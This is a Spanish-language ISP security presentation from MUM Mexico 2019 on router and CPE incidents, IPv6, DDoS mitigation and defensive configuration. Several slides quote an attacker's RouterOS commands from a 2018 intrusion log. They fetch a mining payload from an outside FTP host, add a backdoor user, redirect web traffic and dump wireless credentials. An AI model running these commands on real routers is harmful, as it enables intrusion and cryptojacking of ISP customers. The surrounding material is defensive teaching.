Presentation 6865 1556086901 PDF

IoT + IPv6 - NAT + DDoS
Retos de seguridad y buenas

practicas para ISPs y WISPs
MUM Mexico 2019

Wardner Maia
Introducción
Wardner Maia
Ingeniero - Electrotecnia, Electrónica con

especialización en Telecomunicaciones;
Proveedor de acceso desde 1995;
Entrenamiento para ISPs desde 2002;
Director técnico de MD Brasil IT & Telecom;
Director de LACNIC.
©Copyright md brasil - direitos reservados 2

Introducción
MD Brasil IT & Telecom
ISP en el interior de São Paulo - Brasil;

Red propia de fibra óptica con 12k+ clientes;
Integración de equipos de telecomunicaciones;
Entrenamientos y capacitación para ISPs;
Servicios de consultoría.
http://mdbrasil.com.br http://mikrotikbrasil.com.br

Participaciones en MUMs de
Europa
1) Wireless Security (2008 – Krakow/PL)
2) Wireless Security for OLPC project (2009 – Prague/CZ)
3) Layer 2 Security (2010 – Wroclaw/PL)
4) Routing Security (2011 – Budapest/HU)
5) IPv6 Security (2012 - Warsaw/PL)
6) BGP Filtering (2013 – Zagreb/CR)
7) MPLS VPNs Security (2014 – Venice/IT)
8) Network Simulation (2015 – Prague/CZ)
9) DDoS – detection and mitigation (2016 – Ljubljana/SL)
10) IoT, IPv6 and new ISP challenges for Internet Security (2017 -
Milan/IT)
11) From IPv4 scarcity to IPv6 Fulness - How a good IPv6 planning
can help on security (2018 - Berlin, Germany)
http://mikrotikbrasil.com.br/artigos
Algunos incidentes de
seguridad recientes
contra redes de acceso

Mayo, 2016
CPEs de Ubiquiti son

infectadas
Ataques a clientes de rádio
mayo, 2016
¡Más de 200 mil clientes de radio sin

acceso a Internet!

mayo, 2016
Un Virus Inteligente
- Un script que exploraba una vulnerabilidad en el servicio

http / https de las CPEs;
- Una vez que el equipo era infectado, él pasaba a

escanear la vecindad para encontrar e infectar otros
equipos similares y igualmente vulnerables;
- Por este comportamiento se denominó "Virus"

mayo, 2016
Había muchas variantes de ese "Virus, siendo que en la más

común los WISPs tenían sus equipos resetados y la
contraseña cambiada para" motherfucker "
Los WISPs perdían el acceso al equipo y muchos tenían que

ir hasta las torres para tener acceso local y resolver el
problema.
- Muchos clientes llegaron a quedarse sin acceso a Internet

por más de 1 semana !!!!

mayo, 2016
Mayo / 2016
maio, 2016
La falla era previamente conocida por el

fabricante gracias a un programa de
recompensas por descubrimiento de Bugs
(Bug Bounty Program).
El fabricante publicó una actualización

corrigiendo el Bug, pero no fue
suficientemente enfático en cuanto a la
importancia de la actualización
Por otro lado, los ISP afectados no hicieron la actualización

del sistema y no estaban utilizando otras buenas prácticas
para seguridad, como deshabilitando servicios innecesarios,
restringiendo el acceso a determinados IPs, etc.

Noviembre, 2016
CPEs de Deutsche
Telekom invadidas

¡Routers de
Deutsche Telecom
atacados!

¡Routers de
Deutsche Telecom
atacados!
Deutsche Telekom
- El ataque exploró el protocolo TR-064,

puerto 7547, el mismo utilizado por el TR-
069
- El atacante exploró la vulnerabilidad

forzando a los routers a descargar código
malicioso;
- Casi un millón de usuarios quedaron sin

acceso y los routers se convirtieron en
robots para ataques DDoS.

Marzo, 2017
Vulnerabilidades de vários
Vendors expuestos

Vulnerabilidad en el
servicio http
Marzo, 2017
Wikileaks publica documento da CIA mostrando

herramientas de hacking para explotar vulnerabilidad de
varios equipos, entre ellos el RouterOS, donde una
vulnerabilidad en el servicio Web era revelada.
Corregida en las versiones 6.37.5 y 6.38.5 el 09 / Marzo /

2017

Marzo, 2018
Vulnerabilidade de Winbox
afecta maquinas de los
usuarios

Slingshot
PDF: https://bit.ly/2DllaQV
Problema hasta entonces no descubierto,

probablemente posibilitado por la vulnerabilidad
anterior;
Infectaba las máquinas de los usuarios descargando un

DLL malicioso para la obtención de datos
confidenciales;
Corregido en las actualizaciones de Winbox> 3x

Slingshot
….
Here we need to add that we reported this issue to router manufacturer,
and MikroTik has already dealt with this problem. However, our experts
believe that MikroTik not the only brand used by Slingshot actors —
there may be other compromised devices.
Es cierto que Mikrotik ha sido vector de la distribución de

ese malware;
Sin embargo, otros vendors pueden haber sido igualmente

utilizados.

Abril, 2018
Obtención de usuários y
contraseñas de Mikrotik

Obtención de la base
de datos
Abril, 2018
Obtención, sin
autenticación de los
usuarios y contraseñas
del RouterOS;
Vulnerabilidad
corregida en tiempo
récord en las versiones
6.40.8 y 6.42.1

Pausa para una
pequeña demostración

2018, Mayo/Junio/...hasta
hoy.
Invasiones com fines de

lucro!
¡Invasión con fines
de lucro!
Agosto, 2018
Los enrutadores no actualizados e invadidos pasan a ser
usados como mineros de crypto monedas

¡Invasión con fines de
lucro!
log remoto de una invasión (julio, 2018)

lucro!
Explorando el servidor de ftp
Arquivos: backup.ht1 e
backup.rs1
lucro!
fetch / proxy / user
/tool fetch address=37.233.26.234 src-path=backup.ht1 upload=no user=ftu
mode=ftp password=ftu dst-path="webproxy/error.html"
/ip proxy set enabled=yes

/ip proxy access add action=deny disabled=no
/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-
address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy
/ip firewall nat move [find comment=sysadminpxy] destination=0
/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080
action=add-src-to-address-list address-list=Ok address-list-timeout=1m
comment=sysadminpxy
/user group add name=ftpgroupe policy="ftp,read"

/user add name=ftu password=ftu group=ftpgroupe

lucro!
DNS / DDNS
/ip dns set servers=8.8.8.8
/ip service set www disabled=yes port=80
/ip service set winbox disabled=no port=8291
/ip service set ftp disabled=no port=21
/ip service set ssh disabled=no port=22
/ip cloud set ddns-enabled=yes

/system routerboard print file=sn111
/interface wireless security print file=sn112
/interface wireless print file=sn113

lucro!
/system scheduler
/system scheduler add name="Auto113" start-time=01:30:00 interval=1d

on-event="/system backup save dont-encrypt=yes name=bfull113"
policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,
web,winbox,write

on-event="/system backup load name=bfull113 password=\"\""
web,winbox,write

on-event="/file remove a113.rsc\r\n/file remove bfull113.backup\r\n/file
remove sn111.txt\r\n/file remove sn112.txt\r\n/file remove sn113.txt"
web,winbox,write

lucro!
Arquivo backup.rs1:
script .rsc de configuração do RouterOS
Arquivo backup.ht1:
JS de mineria Hash del atacante

Actualización del Bug
de Winbox
https://mikrotik.com/download/changelogs/
¿Cómo esta la situación
después de casi 1 año?

Coinhive – situación
en el mundo
6K+
4K+
10K+

en el mundo
16/11/2018
01/04/2019

en Mexico
216 equipos infectados

Quién actualizó (y cambió
las contraseñas)
¿Puede dormir tranquilo?

Otras actualizaciones en
2018

Actualizaciones
https://nvd.nist.gov/vuln/search
Mas Actualizaciones
https://mikrotik.com/download/changelogs/
Actualizaciones recientes
(y importantes)

Firewall y NAT bypass
(11/02/2019)
https://medium.com/tenable-
techblog/mikrotik-firewall-nat-
bypass-b8d46398bf24
https://nvd.nist.gov/vuln/search
IPv6 Issues
(04/04/2019)
Todos que están utilizando IPv6 en sus reds deben actualizar los routers
para una de las versiones abajo:
- 6.43.14 (long term)
- 6. 44.2 (stable)
- 6.45beta27 (testing)
https://mikrotik.com/download

¡Estén atentos!
https://blog.mikrotik.
com/archive/
https://mikrotik.com/do
wnload/changelogs/long
-term-release-tree

¿La inseguridad es un
“privilegio” de equipos más
populares (baratos) entre
las ISP regionales?

Otros Vendors
Agosto, 2016
Enero, 2017

Otros Vendors
abril, 2018
mayo, 2018

Otros Vendors
julio, 2018
julio, 2018

“Mercado” de Exploits
Resetear cuenta de Twitter B$ 0,209

Bypass de cuenta de Instagram: B$ 0,187
etc...

“Mercado” de Exploits

¿Suerte o competencia?
En los recientes incidentes involucrando

CPE de ISPs regionales (UBNT en 2016
y Mikrotik en 2018), muchos fueron
afectados pero otros no (incluso
algunos que estaban desactualizados).
¿En un mundo de equipamientos y

sistemas inseguros, y con una facilidad
increíble de comercio de "maldades" lo
que difiere a los ISP que no fueron
afectados de aquellos que sufrieron
y causaron perjuicios a sus clientes?

¡Buenas prácticas
de seguridad!

RFC 3514
¡La solución definitiva!

Evil bit
RFC3514
Network Working Group S. Bellovin
Request for Comments: 3514 AT&T Labs Research
Category: Informational 1 April 2003
The Security Flag in the IPv4 Header
….
Abstract
Firewalls, packet filters, intrusion detection systems, and the like often have
difficulty distinguishing between packets that have malicious intent and
those that are merely unusual. We define a security flag in the IPv4 header as
a means of distinguishing the two cases.

Evil bit
Encabezado IP
Flags:
- Reserved (Evil Bit)
- Don’t Fragment
- More fragments follow

Evil bit
RFC3514
2. Syntax
…
0x0 If the bit is set to 0, the packet has no evil intent.
0x1 If the bit is set to 1, the packet has evil intent.
….
3. Setting the Evil Bit
There are a number of ways in which the evil bit may be set. Attack
applications may use a suitable API to request that it be set.
Systems that do not have other mechanisms MUST provide such an API;
attack programs MUST use it.
….
4. Processing of the Evil Bit
Devices such as firewalls MUST drop all inbound packets that have the
evil bit set. Packets with the evil bit off MUST NOT be dropped.
Dropped packets SHOULD be noted in the appropriate MIB variable.

Evil bit
RFC3514 ¡Es una broma!

Network Working Group S. Bellovin
Request for Comments: 3514 AT&T Labs Research
Category: Informational 1 April 2003
The Security Flag in the IPv4 Header
….
Abstract
Firewalls, packet filters, intrusion detection systems, and the like often have
difficulty distinguishing between packets that have malicious intent and those that
are merely unusual. We define a security flag in the IPv4 header as a means of
distinguishing the two cases.

Seguridad en TI
No hay solución mágica;
No existen soluciones simples o únicas;
Implementar seguridad es laborioso;
Sus clientes no te van a elogiar por eso;
La seguridad puede costar mucha plata y no resulta en

ganancia directa;
- Pero la falta de ella puede traer mucho daño...

¡El culpable será
siempre el ISP!

Agenda

Seguridad Física

Seguridad Física
Equipos en ambientes
externos y en dependencias
de clientes
Deshabilitar las interfaces no utilizadas:
Interfaces habilitadas sin necesidad pueden ser utilizadas por

los atacantes para obtener información importante de la red.
Incluso en setups teóricamente seguros, el acceso a

interfaces puede ser puerta de entrada para exploraciones
más profundas. Ver presentación Seguridad de VPN MPLS:
https://mum.mikrotik.com/2014/BR/agenda/EN#0DMTOxO4E9

Seguridad Física
de clientes
No dejar ficheros de backup en enrutadores
Los ficheros de respaldo pueden contener información

sensible de la red, incluso usuarios / contraseñas.
- La creación de copia de seguridad automática cuando se

resetea un RouterBoard facilita el trabajo de los atacantes
- La copia de seguridad no está cifrada a menos que sea

definida una contraseña (a partir de 6.43).

Seguridad Física
de clientes
No dejar ficheros suppout.rif en los enrutadores
- Los ficheros suppout.rif sirven para resolver problemas

diversos. Se puede crearlos manualmente o son creados
automáticamente en ciertas situaciones;
- Información visualizada por el sitio de Mikrotik;
- Sin embargo, en Internet es un script Perl, que obtiene la

información relevante del mismo:
https://pastebin.com/pa30DNfw
Seguridad Física
Mitigación
No dejar ficheros de backup en los enrutadores
No dejar ficheros suppout.rif en los enrutadores
Como los ficheros se crean

automáticamente, la solución
es un script persistente que
limpia estos a cada arranque
(boot), lo que se puede hacer
a través de Netinstall

Seguridad Física
de clientes
Base de usuarios locales
- Evite dejar usuarios locales en los routers. Utilice la

autenticación vía RADIUS
- Sus técnicos argumentarán que es necesario un usuario

local para situaciones de emergencia.
- Evite las contraseñas "estándar" y si es convencido que

debe tener usuario local, considere la creación de uno, pero
restringiendo por ssh y utilizando una clave RSA
Seguridad Física
Creación de una clave RSA para uso en Mikrotik

Seguridad Física
subiendo al enrutador por ftp

Seguridad Física
Creación de un usuario con acceso restringido
Además de la contraseña la clave RSA hay que estar en la

maquina que accede el enrutador.
Seguridad Física
LCD
Si realmente necesitas el LCD activo,

asegúrate de que esté en modo de sólo
lectura. En contrario, el PIN (default =
1234) será solicitado y el atacante
puede hacer cosas como añadir una IP,
hacer un reboot y hasta un reset del
enrutador

Segurança Física
Protected Bootloader
Evita que un atacante con acceso físico, obtenga los archivos
y configuraciones de RouterOS, deshabilitando el arranque vía
ethernet;
Se puede habilitar y deshabilitar sólo dentro del RouterOS,

después del login;
Cuando está habilitado, botones de reset y acceso a través de

la consola quedan deshabilitados;
No todos los equipos soportan y es necesario un paquete

especial para esta función:
https://wiki.mikrotik.com/wiki/Manual:RouterBOARD_settings#Protected_bootloader

Seguridad en la
Capa 2

Seguridad en la
Capa 2
MAC-Server
Deshabilite MAC-Server
para Telnet y Winbox
siempre que sea posible.
Si es necesario, habilite
sólo en interfaces
específicas y controladas
MNDP
Deshabilite las interfaces de
descubrimiento siempre que sea
posible para evitar ataques MNDP.

Seguridad en la
Capa 2
Aislamiento de clientes inalámbricos
En el caso de que haya más de una
interfaz inalámbrica, utilice también
los filtros de bridge, o la
configuración de horizon

Seguridad
Inalámbrica
Cifrado Wireless
Utilice los métodos de
criptografía corporativos
provistos por RouterOS.
Autenticación PPPoE no es
método de seguridad!
Ataques de “de-autenticación”
Funcionalidad propietaria
Mikrotik que evita ataques
"deauth", inherente al
protocolo 802.11
MUM 2008 - Krakow - Poland
http://mikrotikbrasil.com.br/artigos/Wireless_Security_Poland_2008_Maia.pdf
Seguridad en la
Capa 2
Hay muchos otros problemas de seguridad en la

capa 2 que dependen de la topología específica y de
las funcionalidades empleadas. Algunos ejemplos:
- Mac Flooding
- DHCP Starvation
- Vlan hopping attack
- Spanning tree attacks
- ARP poisoning attacks
Para un trabajo más detallado en ataques de capa 2 y

mitigación, comprobar:
MUM 2009 - Buenos Aires - Argentina

http://mikrotikbrasil.com.br/artigos/Seguridad_en_la_capa2_Argentina_2009_Maia.pdf

Seguridad de Servicios

Seguridad de
Servicios
Resultados de nmap
Puertos TCP abiertas por defecto: 21, 22, 23, 80,

2000 e 8291

Seguridad de
Servicios
Resultados de OpenVAS
Dos vulnerabilidades de severidad baja y

sólo una de severidad media (SSH Weak Encryption)

Seguridad de
Servicios
IP Services
Deshabilitar servicios innecesarios;
Para los que va a mantener,

cambie los puertos por defecto;
Restringir el acceso a
determinados IPs
Puede parecer paranoia, pero además de restringir por IP,

para servicios activos, es importante también restringir
en el Firewall (ver siguiente diapositiva)

Seguridad de
Servicios
IP Firewall
En el canal Input, restringir
el acceso a servicios sólo
para IPs administrativos;
**
** Although it seems redundant, the reason to block services/ports also in /ip

firewall was pointed by Tom Smyth (wirelessconnect.eu):
“As far as I am aware and from tests I carried out about 7 or 8 years ago the
allowed from IP addresses in IP services menu uses TCP wrappers and
actually allows TCP connections from any address (regardless of what IPs
you specified) the decision to allow or deny a user login is taken after the
connection is made so there could be a window for the exploit to be uploaded.”

Seguridad de
Servicios
Bandwidth Test Server
No hay razón para dejar el

BW-test habilitado (y viene
habilitado por defecto)
Habilite sólo cuando lo utilice

y vuelva a deshabilitarlo

Seguridad de
Servicios
Habilitar Criptografía Fuerte
Desde la versión v.30, Mikrotik ha modificado el módulo

ssh introduciendo métodos y algoritmos de encriptación
fuertes.
El cifrado fuerte está deshabilitado por defecto (Open

VAS lo revela)
La habilitación debe ser considerada, siempre que las

aplicaciones de la caja justifiquen pues hay un impacto en
los recursos de hardware.
Seguridad de
Servicios
Servicios deshabilitados por defecto y que deben
permanecer deshabilitados:
/ip upnp /ip socks /ip smb
Si no estas seguro de los servicios que se están

ejecutando en su caja, intente descubrirlos con nmap:

Seguridad en
enrutamiento

Seguridad en
enrutamiento
OSPF y OSPFv3
- Utilice criptografía;
- Configure interfaces de clientes en modo pasivo;
- Descarte el protocolo 89 en las interfaces externas.
MUM 2011 - Budapest - Hungria

http://mikrotikbrasil.com.br/artigos/Routing_Security_and_best_practices_Hungary_2011_Maia.pdf

Seguridad en
enrutamiento
BGP
- Utilice criptografía MD5;

- Utilice el TTL "hack";
- Filtre prefijos BOGON;
- Filtre prefijos no deseados, como
sus propios, etc;
- Filtrar AS-Path muy grandes;
etc ...
MUM 2013 - Zagreb - Croacia

http://mikrotikbrasil.com.br/artigos/BGP_Filtering_with_RouterOS_%202013_MUM-Zagreb-Cr_Maia.pdf

Seguridad en
enrutamiento
VPNs MPLS (VRF e VPLS)
- Utilice sólo rutas estáticas entre

CE -> PE;
- No permita acceso a terceros a los

routers CE;
- Proteja la red contra spoof usando

uRPF;
- Considere el uso de IPSec entre PEs.
MUM 2014 - Venezia - Itália

http://mikrotikbrasil.com.br/artigos/MPLS_VPNs_Security_MUM_2014_Venice-It_Maia.pdf

Agenda

Seguridad por niveles
Protección de los equipos;

Blackhole de direcciones Bogons;
Protección DDoS
Borde de área
Blackhole de malwares;
Filtros de buenas prácticas BGP.
Protección de los equipos

Tránsito
Especial atención en las
protecciones de las capas I y II

Implementación de BCP38;
Acceso Filtros de malwares conocidos
Filtros de conexiones no válidas
Seguridad de CPEs


Protección DDoS
Borde de área

Tránsito

Seguridad de CPEs

Proteccíon de los
Equipos
Protección de Input 1/2

Proteccíon de los
Equipos
Protección de Input 2/2

Proteccíon de los
Equipos
Port knock para acceso remoto y Honeypot
para abuso de port knock


Protección DDoS
Borde de área

Tránsito

Seguridad de CPEs

Blackhole de
direcciones BOGONS
Para la obtención de información de prefijos bogons de forma
automática, podemos establecer una sesión BGP con Cymru
http://www.team-cymru.org/
El router de Cymru nos enviará las rutas bogons, con

Community (65332: 888)
95
Tratando las rutas
BOGONS
Aceptando las rutas de Cymru y
colocándolas en blackhole: Evitando otras
entradas y salidas:
96

Protección DDoS
Borde de área

Tránsito

Seguridad de CPEs

Recursos para DDoS
Sob ataque, considerar

deshabilitar el routing cache;
Recurso que puede ser util en caso

de ataque Syn flood;

Mitigación de DDoS con
Fastnetmon y ExaBGP
MUM 2016 - Ljubljana - Slovenia

https://mum.mikrotik.com/2016/EU/agenda/EN#0DMTOyOwY9
LACNIC 25 - La Habana - Cuba

https://www.slideshare.net/pavel_odintsov/ddos-detection-at-small-isp-by-wardner-maia

Fastnetmon y ExaBGP
En condiciones normales los enrutadores de borde están

enviando informaciones de Flows para Fastnetmon.
ExaBGP tiene sesiones iBGP con los enrutadores de borde.
Traffic Flow
information
Mitigación
Sessiones IBGP

Fastnetmon y ExaBGP
Cuando un DDoS es detectado, Fastnetmon dispara

ExaBGP, que envía las rutas por iBGP con una community
especifica para blackholing. Los enrutadores de borde
anuncian dicha dirección para la solución de mitigación.
Traffic Flow
information
Mitigación
Fastnetmon
aciona ExaBGP
Fastnetmon y ExaBGP

Traffic Flow
information
Mitigación
Anuncios iBGP

Fastnetmon y ExaBGP

Traffic Flow
information
Mitigación
Anuncios eBGP
Anuncios iBGP

Posibles tecnicas de
mitigación

Blackhole remotamente
accionado (RTBH)
Internet
ISP X esta sofriendo un ataque
DDoS direccionado para el IP
x.x.x.x/32, causando la
inundación del link;
Upstream
Su proveedor de upstream
Provider (ejemplo AS 100) tiene una
política que pone en blackhole
los anuncios /32 que tenga una
community determinada
(ejemplo 100:666);
ISP X

Blackhole remotamente
accionado (RTBH)
ISP anuncia para su upstream la
dirección IP /32 con la community
Internet 100:666;
Upstream tiene filtros que

reconocen la community y
automáticamente ponen la
dirección anunciada en blackhole;
Upstream
Provider
La comunicación con este /32 es
x.x.x.x/32, perdida, pero la inundación del
community 100:666 link es parada;
ISP O SLA de los otros clientes es

preservado, pero podemos decir
que el ataque tuve suceso
Mitigación en la nube
(Sinkhole)
Internet
Proveedor de
solución de
Mitigación
ISP1
ISP2
ISP X esta sufriendo un ataque

ISP X DDoS por todos sus upstreams.

Internet
Proveedor de
solución de
Mitigación
ISP1
ISP2
Announce your /24
ISP X
ISP X anuncia través de un túnel
el /24 que contiene la(s)
dirección(es) atacadas

Your /24 announced
Internet
Proveedor de
solución de
Mitigación
ISP1
ISP2
Mitigation Provider announces

the /24 to the Internet, receives
Your the traffic destined to the victim,
AS filter the bad traffic and give
back “clean” traffic

Your /24 announced
Internet
Proveedor de
solución de
Mitigación
ISP1
ISP2
Only “clean” traffic flows
Proveedor de Mitigación anuncia

el /24 para la Internet, recibe el
Your trafico destinado a la victima,
AS filtrando el trafico “sucio” e
forneciendo el trafico “limpio”
través de un túnel.
Cymru - UTRS
UTRS – Unwanted Traffic

Removal
Content
Providers
ISP
BGP
BGP
UTRS ISP
BGP
ISP
Internet
BGP
BGP
ISPs establecen sesiones
ISP BGP con Cymru para el
ISP
servicio UTRS
http://www.team-cymru.org/UTRS/
Cymru - UTRS
UTRS – Unwanted Traffic

Removal
Content
Providers
ISP
BGP
BGP
UTRS ISP
BGP
ISP
Internet
BGP
BGP
ISPs establecen sesiones
ISP BGP con Cymru para el
ISP
servicio UTRS
http://www.team-cymru.org/UTRS/
Cymru - UTRS
Content
Providers
ISP
ISP X
ISP
Internet
ISP
ISP
El ISP X está sufriendo un

ataque DDoS, comprometiendo
el tráfico legítimo.
Cymru - UTRS
Cymru - UTRS
Content
Providers
ISP
UTRS ISP X
ISP
Internet
ISP X anuncia el / 32 atacado

ISP para UTRS y los otros ISPs
ISP
ponen en blackhole el IP
anunciado.
El tráfico legítimo (por ejemplo,
Cymru - UTRS los proveedores de contenido no
se ven afectados)

Protección DDoS
Borde de área

Tránsito

Seguridad de CPEs

Protecciones de
Malwares conocidos

Cómo construir o
obtener su propia lista
de malwares

Listas de Malwares
Hay muchos repositorios públicos con información

de malware:
360chinad, 360conficker, 360cryptolocker, 360gameover, 360locky,

360necurs, 360tofsee, 360virut, alienvault, atmos, badips,
bambenekconsultingc2dns, bambenekconsultingc2ip,
bambenekconsultingdga, bitcoinnodes, blackbook, blocklist, botscout,
bruteforceblocker, ciarmy, cruzit, cybercrimetracker, dataplane,
dshielddns, dshieldip, emergingthreatsbot, emergingthreatscip,
emergingthreatsdns, feodotrackerdns, feodotrackerip, greensnow, loki,
malc0de, malwaredomainlistdns, malwaredomainlistip, malwaredomains,
malwarepatrol, maxmind, myip, nothink, openphish, palevotracker,
policeman, pony, proxylists, proxyrss, proxyspy, ransomwaretrackerdns,
ransomwaretrackerip, ransomwaretrackerurl, riproxies, rutgers, sblam,
socksproxy, sslipbl, sslproxies, talosintelligence, torproject, torstatus,
turris, urlvir, voipbl, vxvault, zeustrackerdns, zeustrackerip,
zeustrackermonitor, zeustrackerurl, etc.

Listas de Malwares
Scripts en Python para obtener

automáticamente la información
en estos repositorios

Tratamiento de
Malwares
Listas públicas
Blackholing
Route Server
(ExaBGP)
Logs
Syslogd DNS

Como obtener una
lista de Malwares
Obtener de forma automática:
1) Escribir un mail para:

feed-bgp@mdbrasil.com.br, solicitando una sesión
BGP para feed de malwares;
2) Configurar una sesión BGP con los datos informados

por MD Brasil;
3) Configurar los filtros de sus routers de borde para

poner en blackhole los IPs de malware;
4) Reportar para feed-bgp@mdbrasil.com.br problemas

e posibles falsos positivos.


Protección DDoS
Borde de área

Tránsito

Seguridad de CPEs

Filtrados de Upstreams
Filtrados (mínimos) a aplicar en todos los upstreams:
- Descartar la recepción de su propio prefijo (y sub redes);

- Descartar redes privadas y reservadas previstas en la RFC
5735;
- Descartar la recepción de ASNs Bogons;
- Descartar anuncios de redes menores que / 24;
- Descartar anuncios que tengan más de X AS en el AS-Path
MUM 2013 - Zagreb - Croacia

http://mikrotikbrasil.com.br/artigos/BGP_Filtering_with_RouterOS_%202013_MUM-Zagreb-Cr_Maia.pdf
123

Protección DDoS
Borde de área

Tránsito

Seguridad de CPEs

BCP 38
Implantación de BCP 38 (RFC 2827) nada más es que evitar

que sus clientes hagan spoofing
- No protege su red, pero evita que sus clientes sean

vectores de ataques basados en spoof
- Puede ser implementada a través de reglas de Firewall

(impacto en performance)
- Implementación indicada, a través de uRPF (Unicast

Reverse Path Forward)

BCP 38
Filtro uRPF
- modo strict: El paquete es enviado sólo si la interfaz que

recibe el paquete tiene una ruta inversa para el IP de origen
del paquete.
- modo loose: El paquete es enviado si el router tiene

alguna ruta inversa para devolver el paquete.


Protección DDoS
Borde de área

Tránsito

Seguridad de CPEs

Protección de CPEs
IPv4
Parte de las funciones de los concentradores de accesso

(PPPoE, DHCP, etc) pueden ser transferidos o duplicados en
las CPES, como:
- Accesso WAN a los equipos solamente por IPs

administrativos del ISP (accesso LAN liberado para
permitir manejo de los clientes)
- Bloqueo de puertos innecessários y malwares
- BCP 38, etc

Protección de las CPEs
IPv6

Seguridad en un mundo
sin NAT
NAT
NAT se inventó para extender la

vida de IPv4, no para proveer
seguridad
Sin embargo el NAT da como “bono”

un Firewall Statefull, ocultando la
topología interna de la red

Seguridad de CPEs
IPv6
RFC 6092
Seguridad para CPEs IPv6
RFC 6092 proporciona recomendaciones de buenas

prácticas para CPEs (50 en total)
Recomienda la implementación de un firewall statefull que

permite sólo tráfico entrante, solamente si esto se
inicia dentro de la red;
Sin embargo, la RFC impone un modo "transparente" de

operación que los clientes pueden habilitar;
El tráfico IPsec siempre se permite en cualquier dirección;

Seguridad de CPEs
IPv6
/ipv6 firewall – canal Input

Seguridad de CPEs
IPv6
/ipv6 firewall – canal Forward

Después de las
implementaciones de
seguridad probadas y
aprobadas ...
¿Es tiempo de
relajarse?

Gestión de seguridad
a gran escala
Tonterías suceden todo el tiempo...
- Equipos dañados se sustituyen "al vapor" para restablecer

el servicio y los técnicos se olvidan de hacer todas las
configuraciónes apropiadas;
- Uno de los técnicos cambia alguna configuración para

probar algo y se olvida de deshacer;
- Un cliente "muy experto" con la contraseña de la CPE,

cambia configuraciónes abriendo brechas de seguridad;
- El fabricante lanza una actualización de seguridad que tiene

que aplicarse a gran escala.

Agenda

Herramientas para
monitoreo y control de
la red

Herramientas para
la red
iTop es un software libre para la gestión de hardware,

software y servicios asociados que permite la
centralización de la información sobre dispositivos,
software local, etc. Ayuda a HelpDesk, administra la
calidad de los servicios y la gobernanza de TI (ITSM).
Conjuntamente con las otras herramientas se utiliza en

la gestión de incidentes de seguridad de una forma
estructurada y formal.
Herramienta de código abierto sin licencia o límites

https://www.combodo.com/itop-193

Herramientas para
la red
Zabbix es un software diseñado para monitoreo en tiempo

real que se puede utilizar para varias aplicaciones;
En cuanto a la seguridad, puede chequear regularmente

puertas abiertas, servicios no deseados, versiones de
firmware e incluso acciones se pueden hacer a través de
Zabbix;
Zabbix es Open Source y por lo tanto no hay costo de

licencias.
http://www.zabbix.com/

Herramientas para
la red
RANCID (Really Awesome New Cisco Config Differ) es

una herramienta libre que monitorea cambios de
configuración de equipos, incluyendo versiones de
software y hardwre (números seriales, etc).
Utiliza CVS (Concurrent Version System), Subversion o

Git para mantener el historial de cambios.
http://www.shrubbery.net/rancid/

Herramientas para
la red
Telegram es una aplicación de comunicación para IOS,

Android y Desktop (Windows, MacOS y Linux).
Telegram tiene una API abierta que permite interactuar

con otros sistemas.
También sin costo de licencias.
https://telegram.org/

Plataforma en
acción
Itop Dashboard

Plataforma en
acción
Configuración de Zabbix
Como ejemplo seleccionamos 2 eventos - Firmware upgrade

(Severidad Alta) y equipo con user = admin, sin contraseña
(Severidad Desastre)
Plataforma en
acción
Una notificación se envía a un

grupo de técnicos responsables por
la seguridad
Zabbix automáticamente crea y

configura una contraseña aleatoria!

Plataforma en
acción
iTOP registra el evento y notifica el back office. Se

genera un ticket de servicio.
Plataforma en
acción
El Back office encamina el

ticket al técnico apropiado
que recibe la notificación
vía email y Telegram y
tiene un tiempo para
solucionar el problema

Plataforma en
acción
El técnico responsable soluciona el problema e informa al

iTOP, cerrando el ticket.

Plataforma en
acción
Muchas acciones se pueden realizar

automáticamente como restablecer un equipo
bloqueado por ejemplo
Un punto de acceso está

presentando problemas;
Reboot automático vía

RB 750UP;
Punto de acceso ahora

OK!

Plataforma en
acción
Cadastros solamente en iTOP

Pausa para una
pequeña demostración
https://t.me/jarvismd_bot

Agenda

Extra Slides

Firewall Rules
Forward Channel
/ipv6 firewall filter
add action=accept chain=forward comment="Transparent mode"

disabled=yes
add action=accept chain=forward comment="Accept IPSec-esp"

protocol=ipsec-esp
add action=accept chain=forward comment="Accept IPsec-ah"

protocol=ipsec-ah
add action=accept chain=forward comment="Accept connections

originated inside the network" connection-state=new out-
interface=pppoe-out1

Firewall Rules
Forward Channel
add action=accept chain=forward comment="Accept established

connections" connection-state=established
add action=accept chain=forward comment="Accept related

connections“ connection-state=related
add action=accept chain=forward comment="Accept TCP connections

to port 500“ dst-port=500 protocol=tcp
add action=accept chain=forward comment="Accept TCP connections

from port 500“ protocol=tcp src-port=500
add action=drop chain=forward comment="Drop all the rest"

Firewall Rules
Input Channel
add action=drop chain=forward comment="Drop all the rest"

Firewall Rules

add action=drop chain=Multicast_Filters comment="Deny deprecated by
RFC 3879" disabled=no dst-address=fec0::/10
add action=drop chain=Multicast_Filters comment="Deny deprecated by

RFC 3879" disabled=no src-address=fec0::/10
add action=accept chain=Multicast_Filters comment="Allow Link-Local

Scope" disabled=no dst-address=ff02::/16
add action=accept chain=Multicast_Filters comment="Allow Link-Local

Scope" disabled=no src-address=ff02::/16
add action=drop chain=Multicast_Filters comment="Deny other

Multicasts“ disabled=no dst-address=ff00::/8
add action=drop chain=Multicast_Filters comment="Deny other Multicasts“

disabled=no src-address=ff00::/8

Firewall Rules
add action=jump chain=forward comment="Jump to ICMPv6 Common"

disabled=no jump-target=ICMPv6_Common protocol=icmpv6
add action=jump chain=forward comment="Jump to Multicast Control"

disabled=no jump-target=Multicast_Filters
add action=accept chain=ICMPv6_Input comment="Accept Neighbor

Solicitation (135) with hop limit == 255" disabled=no hop-
limit=equal:255 icmp-options=135:0-255 protocol=icmpv6
add action=accept chain=ICMPv6_Input comment="Accept Neighbor

Advertisement (136) with hop limit == 255" disabled=no hop-
limit=equal:255 icmp-options=136:0-255 protocol=icmpv6

Firewall Rules
add action=accept chain=ICMPv6_Common comment="Accept

Destination Unreachablet (type 1)" disabled=no icmp-options=1:0-255
protocol=icmpv6
add action=accept chain=ICMPv6_Common comment="Accept Packet

too big (type 2)" disabled=no icmp-options=2:0-255 protocol=icmpv6
add action=accept chain=ICMPv6_Common comment="Accept Time

exceeded (type 3, code 0)" disabled=no icmp-options=3:0
protocol=icmpv6

Parameter problem (type 4, code 1)" disabled=no icmp-options=4:1
protocol=icmpv6

Firewall Rules

